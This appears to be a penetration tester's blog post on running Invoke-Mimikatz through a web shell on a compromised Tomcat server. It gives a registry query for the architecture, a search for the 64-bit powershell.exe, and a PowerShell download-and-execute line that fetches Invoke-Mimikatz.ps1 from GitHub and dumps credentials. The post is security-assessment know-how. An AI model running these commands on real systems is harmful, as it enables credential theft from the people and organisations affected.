A while back I was messing around with Tomcat for some reason or the other and it got me thinking when I come across Tomcat during assessments it is normally running as system or some kind of admin account. Some times I don't want to/can not use metasploit and I just have the web shell. Yes I could create a user and log in that way but one of the first things I would do is run Mimikatz so why not just do it form the web shell nothing stopping you really so I compiled some commands that would let me run the Invoke-Mimikatz powershell commandlet. Later I then decided to should make the commands automated in a JSP file going forward and I did which can be found here.
So here is a quick run though of what I was doing.
1. Determine the architecture, because if the system is x64 and Tomcat is the x86 the powershell launched will be 32-bit and Invoke-Mimikatz won't work since it cant read the 64-bit lssas process''. The way I did this was a quick registry query the command is.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
2. Find the appropriate install of powershell if it is a 64-bit system. According to multiple sources the 64-bit powershell should be at "%windir%\\sysnative\\WindowsPowerShell\\v1.0\\" but on none of the systems I tested on had powershell there so I had to go looking for it. After some poking around i noticed that on all of my 64-bit test systems there was a folder that started with "amd64_microsoft-windows-powershell-exe" followed by hashes and version information that had the 64-bit powershell which could call. The command I use to find the powershell exe is.
dir /S %windir%\\powershell.exe.
3. After the appropriate powershell instance is found I then run Invoke-Mimikatz.ps1 file by executing the file after downloading it from either github or a local copy if you cant reach external addresses by using
powershell "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds".
So that is the gist of what I did and what my script does.